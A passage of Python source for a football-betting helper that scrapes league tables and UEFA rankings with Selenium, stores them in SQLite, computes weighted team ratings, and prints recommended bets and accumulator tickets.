'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[26]
form_list.append(form_game5)
for form in form_list:
if form == 'w':
form = 3
elif form == 'd':
form = 1
else:
form = 0
try:
home_team_form += form
except:
home_team_form = int(input('Team: ' + home_team_name + '| Please Input Team Form Here: '))
main_cur.execute('''INSERT INTO league_data_home (country_name, league_name, country_league_name, home_position, home_total_clubs,
home_team_name, home_team_id, home_matches_played, home_matches_won, home_matches_draw, home_matches_loss,
home_goal_diff, home_team_form)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
''', (country_name, league_name, country_league_name, home_position, home_total_clubs, home_team_name, home_team_id,
home_matches_played, home_matches_won, home_matches_draw, home_matches_loss, home_goal_diff,
home_team_form))
main_conn.commit()
counter += 1
leagues_scanned += 1
print("Updated home table", leagues_scanned, "of", total_leagues, "|", country_league_name, "table")
def league_data_away(leagues_url):
"""Retrieve away league data for listed leagues"""
leagues_scanned = 0
total_leagues = len(leagues_url)
for league_url in leagues_url:
driver.get(str(league_url[0]))
try:
driver.find_element_by_xpath('//*[@id="tabitem-table-away"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-1"]/tbody').find_elements_by_tag_name('tr')
except:
driver.find_element_by_xpath('//*[@id="tabitem-table"]/span/a').click()
driver.find_element_by_xpath('//*[@id="tabitem-table-away"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-3"]/tbody').find_elements_by_tag_name('tr')
counter = 1
for row in tablerow:
country_name = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[2]').get_attribute('textContent')
league_name = driver.find_element_by_xpath('//*[@id="fscon"]/div[1]/div[2]').get_attribute('textContent')
country_league_name = country_name + ' ' + league_name
away_position = counter
away_total_clubs = len(tablerow)
time.sleep(0.1)
away_team_name = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('textContent')
away_team_id = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('onclick')[
-12:-4]
away_matches_played = int(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[3]').get_attribute(
'textContent'))
away_matches_won = int(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[4]').get_attribute(
'textContent'))
away_matches_draw = int(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[5]').get_attribute(
'textContent'))
away_matches_loss = int(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[6]').get_attribute(
'textContent'))
goal_fa = str(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[7]').get_attribute(
'textContent')).split(':')
away_goal_diff = int(goal_fa[0]) - int(goal_fa[1])
form_list = []
away_team_form = 0
try:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[6]').get_attribute('class')[26]
form_list.append(form_game5)
except:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[1]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[26]
form_list.append(form_game5)
for form in form_list:
if form == 'w':
form = 3
elif form == 'd':
form = 1
else:
form = 0
try:
away_team_form += form
except:
away_team_form = int(input('Team: ' + away_team_name + '| Please Input Team Form Here: '))
main_cur.execute('''INSERT INTO league_data_away (country_name, league_name, country_league_name, away_position, away_total_clubs,
away_team_name, away_team_id, away_matches_played, away_matches_won, away_matches_draw, away_matches_loss,
away_goal_diff, away_team_form)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
''', (country_name, league_name, country_league_name, away_position, away_total_clubs, away_team_name, away_team_id,
away_matches_played, away_matches_won, away_matches_draw, away_matches_loss,
away_goal_diff, away_team_form))
main_conn.commit()
counter += 1
leagues_scanned += 1
print("Updated away table", leagues_scanned, "of", total_leagues, "|", country_league_name, "table")
# ------------------------------------UEFA Rankings-----------------------------------------
def uefa_ranking_delete():
"""Delete the UEFA League Ranking Table"""
main_cur.execute("DELETE FROM uefa_team_ranking")
main_conn.commit()
def uefa_team_ranking():
"""Get the team ranking from the UEFA Coefficient website"""
print("Updating Team Ranking Table")
driver.get('https://www.uefa.com/memberassociations/uefarankings/club/seasonclub/') # Team ranking URL
ranking_table = driver.find_element_by_xpath(
'//*[@id="DataTables_Table_0"]/tbody')
ranking_row = ranking_table.find_elements_by_tag_name('tr')
position_counter = 1
# Get Statistics
for row in ranking_row:
team_rank = position_counter
team_name = str(row.find_element_by_xpath(
'//*[@id="DataTables_Table_0"]/tbody/tr['
+ str(position_counter) + ']/td[2]/span/a[1]').get_attribute('textContent')).strip()
uefa_points = float(row.find_element_by_xpath('//*[@id="DataTables_Table_0"]/tbody/tr['
+ str(position_counter) + ']/td[6]').get_attribute('textContent'))
position_counter += 1
# Plug values into database
main_cur.execute("INSERT INTO uefa_team_ranking (team_rank, team_name, uefa_points) VALUES (?, ?, ?)",
(team_rank, team_name, uefa_points))
main_conn.commit()
print("Updated Team Ranking Table")
# ---------------------------------League Win Calculations----------------------------------------
def league_winmargin(league_names):
"""Calculate the win margin for leagues in the database"""
for country_league_name in league_names:
main_cur.execute("SELECT percentage_chance FROM match_analysis WHERE country_league_name = ? "
"AND TEST_bet_result = 'Lost'", country_league_name)
perc_win_data = main_cur.fetchall()
if len(perc_win_data) < 10:
main_cur.execute("UPDATE leagues SET single_chnc_margin = 65, double_chnc_margin = 35 "
"WHERE country_league_name = ?", country_league_name)
main_conn.commit()
else:
double_chnc = int(round(numpy.percentile(perc_win_data, 75)))
single_chnc = int(round(numpy.percentile(perc_win_data, 90)))
main_cur.execute("UPDATE leagues SET single_chnc_margin = ?, double_chnc_margin = ? "
"WHERE country_league_name = ?", (single_chnc, double_chnc, country_league_name[0]))
main_conn.commit()
def league_winrate(league_names):
"""Calculate the win rates of the leagues in the database for for all matches in a league"""
for country_league_name in league_names:
main_cur.execute("SELECT TEST_bet_result from match_analysis WHERE country_league_name = ? "
"AND TEST_bet_result IS NOT NULL", country_league_name)
data = main_cur.fetchall()
if len(data) == 0:
if country_league_name == 'England Premier League':
main_cur.execute("UPDATE leagues SET league_winperc = 61 "
"WHERE country_league_name = 'England Premier League'")
main_conn.commit()
elif country_league_name == 'England Championship':
main_cur.execute("UPDATE leagues SET league_winperc = 65 "
"WHERE country_league_name = 'England Championship'")
main_conn.commit()
elif country_league_name == 'England League One':
main_cur.execute("UPDATE leagues SET league_winperc = 57 "
"WHERE country_league_name = 'England League One'")
main_conn.commit()
elif country_league_name == 'England League Two':
main_cur.execute("UPDATE leagues SET league_winperc = 68 "
"WHERE country_league_name = 'England League Two'")
main_conn.commit()
elif country_league_name == 'France Ligue 1':
main_cur.execute("UPDATE leagues SET league_winperc = 67 "
"WHERE country_league_name = 'France Ligue 1'")
main_conn.commit()
elif country_league_name == 'Germany Bundesliga':
main_cur.execute("UPDATE leagues SET league_winperc = 66 "
"WHERE country_league_name = 'Germany Bundesliga'")
main_conn.commit()
elif country_league_name == 'Italy Serie A':
main_cur.execute("UPDATE leagues SET league_winperc = 72 "
"WHERE country_league_name = 'Italy Serie A'")
main_conn.commit()
elif country_league_name == 'Netherlands Eredivisie':
main_cur.execute("UPDATE leagues SET league_winperc = 56 "
"WHERE country_league_name = 'Netherlands Eredivisie'")
main_conn.commit()
elif country_league_name == 'Spain LaLiga':
main_cur.execute("UPDATE leagues SET league_winperc = 65 "
"WHERE country_league_name = 'Spain LaLiga'")
main_conn.commit()
elif country_league_name == 'Spain LaLiga2':
main_cur.execute("UPDATE leagues SET league_winperc = 67 "
"WHERE country_league_name = 'Spain LaLiga2'")
main_conn.commit()
else:
main_cur.execute("UPDATE leagues SET league_winperc = 0 "
"WHERE country_league_name = ?", country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
total_played = 0
for bet_result in data:
if bet_result[0] == 'Won':
won += 1
total_played += 1
elif bet_result[0] == 'Lost':
lost += 1
total_played += 1
else:
continue
league_winrate = floor((won / total_played) * 100)
main_cur.execute("UPDATE leagues SET league_winperc = ? WHERE country_league_name = ?",
(league_winrate, country_league_name[0]))
main_conn.commit()
# ---------------------------------Factor Weight Ranking------------------------------------
def position_ranking_winrate(league_names):
"""Calculate the winrate based solely on position ranking for all matches in a league"""
for country_league_name in league_names:
main_cur.execute("SELECT home_position_rank, away_position_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result IS NOT NULL AND country_league_name = ?",
country_league_name)
position_rank_data = main_cur.fetchall()
if len(position_rank_data) == 0:
main_cur.execute("UPDATE leagues SET pos_winrate = 71.52 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_position_rank, away_position_rank, percentage_chance, test_bet_result in position_rank_data:
if home_position_rank > away_position_rank and test_bet_result == 'Won':
won += 1
elif home_position_rank < away_position_rank and test_bet_result == 'Won':
won += 1
elif home_position_rank > away_position_rank and test_bet_result == 'Lost':
lost += 1
elif home_position_rank < away_position_rank and test_bet_result == 'Lost':
lost += 1
else:
continue
try:
position_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
position_win_percentage = 71.52
main_cur.execute("UPDATE leagues SET pos_winrate = ? WHERE country_league_name = ?",
(position_win_percentage, country_league_name[0]))
main_conn.commit()
def team_name_ranking_winrate(league_names):
"""Calculate winrate of team name ranbking"""
for country_league_name in league_names:
main_cur.execute("SELECT home_team_name_rank, away_team_name_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result is not null and home_team_name_rank is not null "
"OR away_team_name_rank is not null and country_league_name = ?",
country_league_name)
team_name_rank_data = main_cur.fetchall()
if len(team_name_rank_data) == 0:
main_cur.execute("UPDATE leagues SET team_name_winrate = 81.82 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_team_name_rank, away_team_name_rank, percentage_chance, test_bet_result in team_name_rank_data:
if home_team_name_rank is None:
home_team_name_rank = 0
if away_team_name_rank is None:
away_team_name_rank = 0
if home_team_name_rank > away_team_name_rank and test_bet_result == 'Won':
won += 1
elif home_team_name_rank < away_team_name_rank and test_bet_result == 'Won':
won += 1
elif home_team_name_rank > away_team_name_rank and test_bet_result == 'Lost':
lost += 1
elif home_team_name_rank < away_team_name_rank and test_bet_result == 'Lost':
lost += 1
else:
continue
try:
team_name_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
team_name_win_percentage = 81.82
main_cur.execute("UPDATE leagues SET team_name_winrate = ? WHERE country_league_name = ?",
(team_name_win_percentage, country_league_name[0]))
main_conn.commit()
def form_ranking_winrate(league_names):
"""Calculate winrate of form ranking"""
for country_league_name in league_names:
main_cur.execute("SELECT home_form_rank, away_form_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result IS NOT NULL AND country_league_name = ?",
country_league_name)
form_rank_data = main_cur.fetchall()
if len(form_rank_data) == 0:
main_cur.execute("UPDATE leagues SET form_winrate = 68.31 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_form_rank, away_form_rank, percentage_chance, test_bet_result in form_rank_data:
if home_form_rank > away_form_rank and test_bet_result == 'Won':
won += 1
elif home_form_rank < away_form_rank and test_bet_result == 'Won':
won += 1
elif home_form_rank > away_form_rank and test_bet_result == 'Lost':
lost += 1
elif home_form_rank < away_form_rank and test_bet_result == 'Lost':
lost += 1
else:
continue
try:
team_form_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
team_form_win_percentage = 68.31
main_cur.execute("UPDATE leagues SET form_winrate = ? WHERE country_league_name = ?",
(team_form_win_percentage, country_league_name[0]))
main_conn.commit()
def gd_ranking_winrate(league_names):
"""Calculate winrate of goal difference ranking"""
for country_league_name in league_names:
main_cur.execute("SELECT home_gd_rank, away_gd_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result IS NOT NULL AND country_league_name = ?",
country_league_name)
gd_rank_data = main_cur.fetchall()
if len(gd_rank_data) == 0:
main_cur.execute("UPDATE leagues SET gd_winrate = 72.81 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_gd_rank, away_gd_rank, percentage_chance, test_bet_result in gd_rank_data:
if home_gd_rank is not None and test_bet_result == 'Won':
won += 1
elif away_gd_rank is not None and test_bet_result == 'Won':
won += 1
else:
lost += 1
try:
gd_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
gd_win_percentage = 72.81
main_cur.execute("UPDATE leagues SET gd_winrate = ? WHERE country_league_name = ?",
(gd_win_percentage, country_league_name[0]))
main_conn.commit()
def pos_weighting_calc(league_names):
""""calculate weightings for position ranking"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
ranking_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in ranking_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
position_weighting = (position_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET pos_weighting = ? WHERE country_league_name = ?",
(position_weighting, country_league_name[0]))
main_conn.commit()
def team_name_weighting_calc(league_names):
""""calculate weightings for team reputation"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
ranking_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in ranking_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
team_name_weighting = (team_name_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET team_name_weighting = ? WHERE country_league_name = ?",
(team_name_weighting, country_league_name[0]))
main_conn.commit()
def form_weighting_calc(league_names):
""""calculate weightings for team form"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
ranking_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in ranking_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
form_weighting = (form_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET form_weighting = ? WHERE country_league_name = ?",
(form_weighting, country_league_name[0]))
main_conn.commit()
def gd_weighting_calc(league_names):
""""calculate weightings for goal differences"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
rank_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in rank_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
gd_weighting = (gd_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET gd_weighting = ? WHERE country_league_name = ?",
(gd_weighting, country_league_name[0]))
main_conn.commit()
# -------------------------------------Analysis---------------------------------------------
def analysis_delete_3month():
"""Delete matches that have results and are older than two months"""
main_cur.execute("DELETE FROM match_analysis where match_datetime < datetime('now', '-3 months')")
main_conn.commit()
def analysis_delete_upcoming():
"""Delete matches that have not been played yet"""
main_cur.execute("DELETE FROM match_analysis WHERE TEST_bet_result ISNULL")
main_conn.commit()
def analysis_insert():
"""Populate match analysis table"""
main_cur.execute("INSERT OR IGNORE INTO match_analysis (match_datetime, country_name, league_name, "
"country_league_name, home_team_name, home_team_id, away_team_name, away_team_ID, home_win, "
"home_draw, away_draw, away_win, home_position, away_position, total_clubs, home_matches_played, "
"away_matches_played, home_matches_won, away_matches_won, home_matches_draw, away_matches_draw, "
"home_matches_loss, away_matches_loss, home_goal_diff, away_goal_diff, home_team_form, "
"away_team_form, match_url) "
"SELECT match_datetime, match_data.country_name, match_data.league_name, "
"match_data.country_league_name, match_data.home_team_name, match_data.home_team_ID, "
"match_data.away_team_name, match_data.away_team_ID, home_win, home_draw, away_draw, away_win, "
"home_position, away_position, home_total_clubs, home_matches_played, away_matches_played, "
"home_matches_won, away_matches_won, home_matches_draw, away_matches_draw, home_matches_loss, "
"away_matches_loss, home_goal_diff, away_goal_diff, home_team_form, away_team_form, match_url "
"FROM match_data "
"INNER JOIN league_data_home ON match_data.home_team_name = league_data_home.home_team_name "
"INNER JOIN league_data_away ON match_data.away_team_name = league_data_away.away_team_name")
main_conn.commit()
def team_ranking_calc_home():
"""Calculate team ranking"""
main_cur.execute("SELECT flashscore_team_name, uefa_points "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name")
result = main_cur.fetchall()
for index, rank in enumerate(result):
if index == 0:
top_point = rank[1]
main_cur.execute("SELECT match_analysis.fid, flashscore_team_name, uefa_points, team_name_weighting "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name INNER JOIN match_analysis "
"ON flashscore_team_name = match_analysis.home_team_name "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
# Calculate team rank
for fid, flashscore_team_name, uefa_points, team_name_weighting in result:
team_rank = (uefa_points / top_point) * team_name_weighting
main_cur.execute("UPDATE match_analysis SET home_team_name_rank = ? WHERE home_team_name = ? AND fid = ?",
(team_rank, flashscore_team_name, fid))
main_conn.commit()
def team_ranking_calc_away():
"""Calculate team ranking"""
main_cur.execute("SELECT flashscore_team_name, uefa_points "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name")
result = main_cur.fetchall()
for index, rank in enumerate(result):
if index == 0:
top_point = rank[1]
main_cur.execute("SELECT match_analysis.fid, flashscore_team_name, uefa_points, team_name_weighting "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name INNER JOIN match_analysis "
"ON flashscore_team_name = match_analysis.away_team_name "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
# Calculate team rank
for fid, flashscore_team_name, uefa_points, team_name_weighting in result:
team_rank = (uefa_points / top_point) * (team_name_weighting)
main_cur.execute("UPDATE match_analysis SET away_team_name_rank = ? WHERE away_team_name = ? AND fid = ?",
(team_rank, flashscore_team_name, fid))
main_conn.commit()
def form_ranking_calc():
"""Calculate form ranking"""
main_cur.execute("SELECT match_analysis.fid, home_team_form, away_team_form, form_weighting FROM match_analysis "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
for fid, home_team_form, away_team_form, form_weighting in result:
home_team_form_ranking = (home_team_form / 15) * form_weighting
away_team_form_ranking = (away_team_form / 15) * form_weighting
main_cur.execute("UPDATE match_analysis SET home_form_rank = ? WHERE fid = ?", (home_team_form_ranking, fid))
main_cur.execute("UPDATE match_analysis SET away_form_rank = ? WHERE fid = ?", (away_team_form_ranking, fid))
main_conn.commit()
def league_position_ranking_calc():
"""Calculate league position ranking"""
main_cur.execute("SELECT match_analysis.fid, home_matches_played, home_matches_won, home_matches_draw, "
"home_matches_loss, away_matches_played, away_matches_won, away_matches_draw, away_matches_loss, "
"pos_weighting FROM match_analysis "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
for fid, hp, hw, hd, hl, ap, aw, ad, al, pw in result:
points_ranking_home = ((hw * 3) + (hd * 1)) / (hp * 3) * pw
points_ranking_away = ((aw * 3) + (ad * 1)) / (ap * 3) * pw
main_cur.execute("UPDATE match_analysis SET home_position_rank = ? WHERE fid = ?", (points_ranking_home, fid))
main_cur.execute("UPDATE match_analysis SET away_position_rank = ? WHERE fid = ?", (points_ranking_away, fid))
main_conn.commit()
def goal_difference_ranking_calc():
"""Calculate goal difference ranking"""
main_cur.execute("SELECT match_analysis.fid, home_goal_diff, away_goal_diff, gd_weighting FROM match_analysis "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
for fid, home_gd, away_gd, gd_weighting in result:
max_n = gd_weighting
h2h_gd = home_gd - away_gd
tru_gd = abs(h2h_gd)
gd_rank = min(max_n, tru_gd)
if h2h_gd > 0:
main_cur.execute("UPDATE match_analysis SET home_gd_rank = ? WHERE fid = ?", (gd_rank, fid))
main_conn.commit()
elif h2h_gd < 0:
main_cur.execute("UPDATE match_analysis SET away_gd_rank = ? WHERE fid = ?", (gd_rank, fid))
main_conn.commit()
else:
continue
def generate_point_totals():
"""Generate the point totals using data in match analysis"""
main_cur.execute("SELECT match_analysis.fid, home_team_name_rank, home_position_rank, home_form_rank, home_gd_rank,"
" away_team_name_rank, away_position_rank, away_form_rank, away_gd_rank, home_win, home_draw, "
"away_draw, away_win, double_chnc_margin, single_chnc_margin "
"from match_analysis INNER JOIN leagues "
"ON match_analysis.country_league_name = leagues.country_league_name "
"WHERE TEST_bet_result IS NULL ")
results = main_cur.fetchall()
for fid, htnr, hpr, hfr, hgdr, atnr, apr, afr, agdr, hw, hd, ad, aw, dcm, scm in results:
if htnr is None:
htnr = 0
if hpr is None:
hpr = 0
if hfr is None:
hfr = 0
if hgdr is None:
hgdr = 0
if atnr is None:
atnr = 0
if apr is None:
apr = 0
if afr is None:
afr = 0
if agdr is None:
agdr = 0
home_total = float(htnr) + float(hpr) + float(hfr) + float(hgdr)
away_total = float(atnr) + float(apr) + float(afr) + float(agdr)
total_diff = home_total - away_total
if total_diff > 0:
percentage_chance = total_diff
if scm > percentage_chance > dcm:
rec_bet = '1x'
elif percentage_chance >= scm:
rec_bet = '1'
else:
rec_bet = 'Avoid'
else:
percentage_chance = abs(total_diff)
if scm > percentage_chance > dcm:
rec_bet = '2x'
elif percentage_chance >= scm:
rec_bet = '2'
else:
rec_bet = 'Avoid'
# Test Recommended bet
if total_diff >= 0:
percentage_chance = total_diff
if 60 > percentage_chance >= 0:
test_rec_bet = '1x'
else:
test_rec_bet = '1'
else:
percentage_chance = abs(total_diff)
if 60 > percentage_chance > 0:
test_rec_bet = '2x'
else:
test_rec_bet = '2'
main_cur.execute("UPDATE match_analysis SET home_points_total = ? WHERE fid = ?", (home_total, fid))
main_cur.execute("UPDATE match_analysis SET away_points_total = ? WHERE fid = ?", (away_total, fid))
main_cur.execute("UPDATE match_analysis SET rec_bet = ? WHERE fid = ?", (rec_bet, fid))
main_cur.execute("UPDATE match_analysis SET percentage_chance = ? WHERE fid = ?", (percentage_chance, fid))
main_cur.execute("UPDATE match_analysis SET TEST_rec_bet = ? WHERE fid = ?", (test_rec_bet, fid))
main_conn.commit()
# ------------------------------------Bet Tickets-------------------------------------------
def percentage_rec_calc():
"""Calculate Percentage recommendation for each match"""
main_cur.execute("SELECT match_analysis.fid, percentage_chance, league_winperc FROM match_analysis "
"INNER JOIN leagues ON match_analysis.country_league_name = leagues.country_league_name "
"WHERE bet_result isnull")
data = main_cur.fetchall()
for fid, percentage_chance, league_winperc in data:
percentage_rec = (percentage_chance + league_winperc) / 2
main_cur.execute("UPDATE match_analysis SET percentage_rec = ? WHERE fid = ?", (percentage_rec, fid))
main_conn.commit()
def view_all_recommended():
"""View all recommended bets"""
main_cur.execute("SELECT match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec "
"FROM match_analysis where bet_result isnull AND rec_bet <> 'Avoid' "
"AND match_datetime > datetime('now') ORDER BY percentage_rec DESC")
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " + rec_bet
+ " | " + str(round(percentage_rec, 2)))
def odds_list():
"""Returns the recommended odds for each match"""
# draw matches from database
main_cur.execute("SELECT fid, rec_bet, home_win, home_draw, away_draw, away_win "
"FROM match_analysis where bet_result isnull AND rec_bet <> 'Avoid' "
"AND match_datetime >= datetime('now', 'localtime') ORDER BY percentage_rec DESC")
data = main_cur.fetchall()
odds_data_list = []
# determine odds and place in dictionary
for fid, rec_bet, home_win, home_draw, away_draw, away_win in data:
bet_odds = ' '
if rec_bet == '1':
bet_odds = float(home_win)
elif rec_bet == '1x':
bet_odds = float(home_draw)
elif rec_bet == '2x':
bet_odds = float(away_draw)
elif rec_bet == '2':
bet_odds = float(away_win)
if bet_odds > 1.14:
odds_data = (fid, bet_odds)
odds_data_list.append(odds_data)
else:
continue
return odds_data_list
def ticket_generation(acca_limit, odds_listing):
"""Create match tickets automatically"""
acca = 1 # Default multiplier
ticket_number = 1
print("--------------------------- Ticket", ticket_number, "----------------------------------")
for odds in odds_listing:
acca = acca * odds[1]
if acca <= acca_limit:
main_cur.execute(
"SELECT match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec FROM match_analysis where fid = ? ", (odds[0],))
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " +
rec_bet + " | " + str(odds[1]) + " | " + str(round(percentage_rec, 2)))
else:
print('Tickets Odds:', round((acca / odds[1]), 2))
acca = 1
ticket_number += 1
print(' ')
print("--------------------------- Ticket", ticket_number, "----------------------------------")
acca = acca * odds[1]
main_cur.execute(
"SELECT match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec "
"FROM match_analysis where fid = ? ", (odds[0],))
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " +
rec_bet + " | " + str(odds[1]) + " | " + str(round(percentage_rec, 2)))
print('Tickets Odds:', round(acca, 2))
# ------------------------------------Results-----------------------------------------------
def match_results():
"""Gather match results"""
print('Collecting match results...')
main_cur.execute('SELECT fid, match_url FROM match_analysis WHERE match_result ISNULL')
data = main_cur.fetchall()
match_count = 0
for fid, match_url in data:
driver.get(match_url)
match_status = driver.find_element_by_xpath('//*[@id="flashscore"]/div[1]/div[2]/div[2]'
).get_attribute('textContent')
if match_status == 'Finished':
home_score = driver.find_element_by_xpath('//*[@id="event_detail_current_result"]/span[1]'
).get_attribute('textContent')
away_score = driver.find_element_by_xpath('//*[@id="event_detail_current_result"]/span[2]/span[2]'
).get_attribute('textContent')
match_result = int(home_score) - int(away_score)
if match_result > 0:
main_cur.execute("UPDATE match_analysis SET match_result = 'Home Win' WHERE fid = ?", (fid,))
main_conn.commit()
match_count += 1
elif match_result < 0:
main_cur.execute("UPDATE match_analysis SET match_result = 'Away Win' WHERE fid = ?", (fid,))
main_conn.commit()
match_count += 1
elif match_result == 0:
main_cur.execute("UPDATE match_analysis SET match_result = 'Draw' WHERE fid = ?", (fid,))
main_conn.commit()
match_count += 1
else:
print("There was an error retrieving a match result", match_url)
continue
print("Number of match results retrieved:", match_count)
elif match_status == 'Postponed':
main_cur.execute('DELETE FROM match_analysis WHERE fid = ?', (fid,))
main_conn.commit()
def bet_result():
"""Calculate the bet result"""
main_cur.execute("SELECT fid, rec_bet, match_result FROM match_analysis WHERE bet_result ISNULL AND match_result IS"
" NOT NULL")
data = main_cur.fetchall()
for fid, rec_bet, match_result in data:
if match_result == 'Home Win' and (rec_bet == '1' or rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (rec_bet == '2' or rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (rec_bet == '1x' or rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
